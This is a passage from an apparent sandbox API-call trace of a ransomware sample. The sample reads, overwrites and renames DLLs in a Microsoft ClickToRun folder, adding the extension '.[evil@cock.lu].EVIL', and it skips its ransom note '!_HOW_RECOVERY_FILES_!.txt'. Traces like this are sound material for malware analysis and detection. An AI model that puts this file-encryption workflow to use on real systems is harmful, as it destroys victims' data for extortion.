lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4ae0, lpOverlapped=0x0) returned 1 [0080.623] CloseHandle (hObject=0x1a4) returned 1 [0080.624] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0080.624] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0080.624] __uncaught_exception () returned 0x84b1160800 [0080.624] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0080.625] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll.[evil@cock.lu].evil")) returned 1 [0080.626] ??_V@YAXPEAX@Z () returned 0x1 [0080.629] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll", dwFileAttributes=0x0) returned 0 [0080.629] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0080.629] wcsstr (_Str="api-ms-win-core-synch-l1-2-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.629] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 91 [0080.629] wcscmp (_String1="api-ms-win-core-synch-l1-2-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0080.629] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-core-synch-l1-2-0.dll") returned 0x0 [0080.629] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 0x5b [0080.629] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0080.631] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4ac0, lpOverlapped=0x0) returned 1 [0080.639] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0080.639] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0080.639] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0080.639] _errno () returned 0x84b1160840 [0080.639] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.639] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x4ae0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4ae0, lpOverlapped=0x0) returned 1 [0080.639] CloseHandle (hObject=0x1a4) returned 1 [0080.644] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0080.645] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0080.645] __uncaught_exception () returned 0x84b1160800 [0080.645] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0080.645] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll.[evil@cock.lu].evil")) returned 1 [0080.646] ??_V@YAXPEAX@Z () returned 0x1 [0080.649] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll", dwFileAttributes=0x0) returned 0 [0080.649] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0080.649] wcsstr (_Str="api-ms-win-core-timezone-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.649] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 94 [0080.649] wcscmp (_String1="api-ms-win-core-timezone-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0080.649] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-core-timezone-l1-1-0.dll") returned 0x0 [0080.649] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 0x5e [0080.649] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0080.651] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x48c0, lpOverlapped=0x0) returned 1 [0080.710] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0080.710] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0080.710] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0080.710] _errno () returned 0x84b1160840 [0080.710] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.710] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x48e0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x48e0, lpOverlapped=0x0) returned 1 [0080.710] CloseHandle (hObject=0x1a4) returned 1 [0080.711] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0080.711] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0080.711] __uncaught_exception () returned 0x84b1160800 [0080.711] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0080.712] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0080.713] ??_V@YAXPEAX@Z () returned 0x1 [0080.747] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll", dwFileAttributes=0x0) returned 0 [0080.748] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0080.748] wcsstr (_Str="api-ms-win-core-xstate-l2-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.748] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 92 [0080.748] wcscmp (_String1="api-ms-win-core-xstate-l2-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0080.748] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-core-xstate-l2-1-0.dll") returned 0x0 [0080.748] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 0x5c [0080.748] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0080.749] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x2d60, lpOverlapped=0x0) returned 1 [0080.794] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0080.794] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0080.794] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0080.794] _errno () returned 0x84b1160840 [0080.794] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.794] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x2d80, lpOverlapped=0x0) returned 1 [0080.794] CloseHandle (hObject=0x1a4) returned 1 [0080.795] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0080.795] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0080.795] __uncaught_exception () returned 0x84b1160800 [0080.795] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0080.796] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll.[evil@cock.lu].evil")) returned 1 [0080.796] ??_V@YAXPEAX@Z () returned 0x1 [0080.799] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll", dwFileAttributes=0x0) returned 0 [0080.799] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0080.799] wcsstr (_Str="api-ms-win-crt-conio-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.799] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 90 [0080.799] wcscmp (_String1="api-ms-win-crt-conio-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0080.799] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-crt-conio-l1-1-0.dll") returned 0x0 [0080.799] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 0x5a [0080.799] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0080.801] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4cc0, lpOverlapped=0x0) returned 1 [0080.832] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0080.832] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0080.832] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0080.832] _errno () returned 0x84b1160840 [0080.832] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.832] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x4ce0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4ce0, lpOverlapped=0x0) returned 1 [0080.833] CloseHandle (hObject=0x1a4) returned 1 [0080.833] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0080.834] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0080.834] __uncaught_exception () returned 0x84b1160800 [0080.834] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0080.835] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0080.835] ??_V@YAXPEAX@Z () returned 0x1 [0080.838] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll", dwFileAttributes=0x0) returned 0 [0080.838] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0080.838] wcsstr (_Str="api-ms-win-crt-convert-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.838] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 92 [0080.838] wcscmp (_String1="api-ms-win-crt-convert-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0080.838] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-crt-convert-l1-1-0.dll") returned 0x0 [0080.838] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 0x5c [0080.838] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0080.840] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x58c0, lpOverlapped=0x0) returned 1 [0080.884] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0080.884] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0080.884] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0080.884] _errno () returned 0x84b1160840 [0080.884] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.884] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x58e0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x58e0, lpOverlapped=0x0) returned 1 [0080.884] CloseHandle (hObject=0x1a4) returned 1 [0080.885] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0080.885] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0080.885] __uncaught_exception () returned 0x84b1160800 [0080.886] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0080.889] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0080.889] ??_V@YAXPEAX@Z () returned 0x1 [0080.893] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll", dwFileAttributes=0x0) returned 0 [0080.893] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0080.893] wcsstr (_Str="api-ms-win-crt-environment-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0080.893] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll") returned 96 [0080.893] wcscmp (_String1="api-ms-win-crt-environment-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0080.893] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-crt-environment-l1-1-0.dll") returned 0x0 [0080.893] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll") returned 0x60 [0080.893] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0080.896] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4ac0, lpOverlapped=0x0) returned 1 [0081.056] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0081.056] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0081.056] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0081.056] _errno () returned 0x84b1160840 [0081.056] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.056] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x4ae0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4ae0, lpOverlapped=0x0) returned 1 [0081.056] CloseHandle (hObject=0x1a4) returned 1 [0081.057] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0081.058] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0081.058] __uncaught_exception () returned 0x84b1160800 [0081.058] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0081.059] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0081.060] ??_V@YAXPEAX@Z () returned 0x1 [0081.063] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll", dwFileAttributes=0x0) returned 0 [0081.063] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0081.063] wcsstr (_Str="api-ms-win-crt-filesystem-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0081.063] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll") returned 95 [0081.063] wcscmp (_String1="api-ms-win-crt-filesystem-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0081.063] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-crt-filesystem-l1-1-0.dll") returned 0x0 [0081.063] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll") returned 0x5f [0081.063] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0081.066] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x50c0, lpOverlapped=0x0) returned 1 [0081.099] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0081.099] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0081.099] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0081.099] _errno () returned 0x84b1160840 [0081.099] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.099] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x50e0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x50e0, lpOverlapped=0x0) returned 1 [0081.100] CloseHandle (hObject=0x1a4) returned 1 [0081.100] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0081.101] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0081.101] __uncaught_exception () returned 0x84b1160800 [0081.101] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0081.102] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0081.102] ??_V@YAXPEAX@Z () returned 0x1 [0081.106] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll", dwFileAttributes=0x0) returned 0 [0081.106] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0081.106] wcsstr (_Str="api-ms-win-crt-heap-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0081.106] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: 